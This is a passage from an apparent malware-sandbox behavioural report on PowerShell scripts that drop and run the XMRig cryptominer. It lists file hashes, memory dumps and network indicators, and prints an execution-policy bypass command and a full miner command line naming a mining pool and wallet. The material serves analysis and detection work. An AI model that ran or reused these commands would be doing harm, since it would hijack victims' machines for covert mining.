US 8.8.8.8:53 169.117.168.52.in-addr.arpa udp

Files

memory/2540-0-0x00007FFB74CF3000-0x00007FFB74CF5000-memory.dmp

memory/2540-6-0x0000028930AA0000-0x0000028930AC2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_03ooksts.msu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2540-11-0x00007FFB74CF0000-0x00007FFB757B1000-memory.dmp

memory/2540-12-0x00007FFB74CF0000-0x00007FFB757B1000-memory.dmp

memory/2540-14-0x00007FFB74CF0000-0x00007FFB757B1000-memory.dmp

memory/2540-15-0x0000028931640000-0x0000028931652000-memory.dmp

memory/2540-16-0x0000028930B10000-0x0000028930B1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/5016-47-0x000001A21CD50000-0x000001A21CD70000-memory.dmp

memory/5016-48-0x000001A21CDA0000-0x000001A21CDC0000-memory.dmp

memory/5016-49-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/2540-50-0x00007FFB74CF0000-0x00007FFB757B1000-memory.dmp

memory/5016-52-0x000001A21E5A0000-0x000001A21E5C0000-memory.dmp

memory/5016-51-0x000001A21E580000-0x000001A21E5A0000-memory.dmp

memory/2540-54-0x00007FFB74CF3000-0x00007FFB74CF5000-memory.dmp

memory/5016-53-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-55-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/2540-56-0x00007FFB74CF0000-0x00007FFB757B1000-memory.dmp

memory/5016-57-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-58-0x000001A21E580000-0x000001A21E5A0000-memory.dmp

memory/5016-59-0x000001A21E5A0000-0x000001A21E5C0000-memory.dmp

memory/5016-60-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-61-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-62-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-63-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-64-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-65-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-66-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-67-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-68-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-69-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-70-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-71-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-72-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-73-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-74-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-75-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-76-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-77-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-78-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-79-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-80-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-81-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-82-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-83-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-84-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-85-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-86-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-87-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-88-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-89-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-90-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-91-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-92-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-93-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-94-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-95-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-96-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-97-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-98-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-99-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-100-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-101-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-102-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-103-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-104-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-105-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-106-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-107-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-108-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-109-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-110-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-111-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-112-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-113-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-114-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-115-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-116-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-117-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

memory/5016-118-0x00007FF7EB720000-0x00007FF7EC353000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:35

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1774s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
SE 184.31.15.184:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 184.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
SE 184.31.15.184:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp

Files

memory/2472-0-0x00007FFA8F5F0000-0x00007FFA8F7E5000-memory.dmp

memory/2472-1-0x00007FFA8F5F0000-0x00007FFA8F7E5000-memory.dmp

memory/2472-2-0x00007FFA8F5F0000-0x00007FFA8F7E5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ja2olhwu.iee.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2472-12-0x000002A6437C0000-0x000002A6437E2000-memory.dmp

memory/2472-14-0x00007FFA8F5F0000-0x00007FFA8F7E5000-memory.dmp

memory/2472-16-0x000002A643B90000-0x000002A643B9A000-memory.dmp

memory/2472-15-0x000002A643BB0000-0x000002A643BC2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1688-47-0x0000017894ED0000-0x0000017894EF0000-memory.dmp

memory/1688-48-0x00007FFA8F5F0000-0x00007FFA8F7E5000-memory.dmp

memory/1688-49-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/2472-50-0x00007FFA8F5F0000-0x00007FFA8F7E5000-memory.dmp

memory/1688-51-0x00007FFA8F5F0000-0x00007FFA8F7E5000-memory.dmp

memory/1688-52-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/2472-53-0x00007FFA8F5F0000-0x00007FFA8F7E5000-memory.dmp

memory/1688-54-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-55-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-56-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-57-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-58-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-59-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-60-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-61-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-62-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-63-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-64-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-65-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-66-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-67-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-68-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-69-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-70-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-71-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-72-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-73-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-74-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-75-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-76-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-77-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-78-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-79-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-80-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-81-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-82-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-83-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-84-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-85-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-86-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-87-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-88-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-89-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-90-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-91-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-92-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-93-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-94-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-95-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-96-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-97-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-98-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-99-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-100-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-101-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-102-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-103-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-104-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-105-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-106-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-107-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-108-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-109-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-110-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-111-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-112-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-113-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

memory/1688-114-0x00007FF64B440000-0x00007FF64C073000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:05

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1743s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 109.116.69.13.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

memory/3120-3-0x00007FFBB4133000-0x00007FFBB4134000-memory.dmp

memory/3120-5-0x000001E45FD30000-0x000001E45FD52000-memory.dmp

memory/3120-9-0x000001E45FEE0000-0x000001E45FF56000-memory.dmp

memory/3120-8-0x00007FFBB4130000-0x00007FFBB4B1C000-memory.dmp

memory/3120-18-0x00007FFBB4130000-0x00007FFBB4B1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rmicqbjo.bfw.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3120-26-0x00007FFBB4130000-0x00007FFBB4B1C000-memory.dmp

memory/3120-49-0x000001E45FF60000-0x000001E45FF72000-memory.dmp

memory/3120-62-0x000001E45FED0000-0x000001E45FEDA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1360-91-0x0000025807A70000-0x0000025807A90000-memory.dmp

memory/1360-92-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-93-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/3120-94-0x00007FFBB4133000-0x00007FFBB4134000-memory.dmp

memory/3120-95-0x00007FFBB4130000-0x00007FFBB4B1C000-memory.dmp

memory/1360-96-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-97-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-98-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-99-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-100-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-101-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-102-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-103-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-104-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-105-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-106-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-107-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-108-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-109-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-110-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-111-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-112-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-113-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-114-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-115-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-116-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-117-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-118-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-119-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-120-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-121-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-122-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-123-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-124-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-125-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-126-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-127-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-128-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-129-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-130-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-131-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-132-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-133-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-134-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-135-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-136-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-137-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-138-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-139-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-140-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-141-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-142-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-143-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-144-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-145-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-146-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-147-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-148-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-149-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-150-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

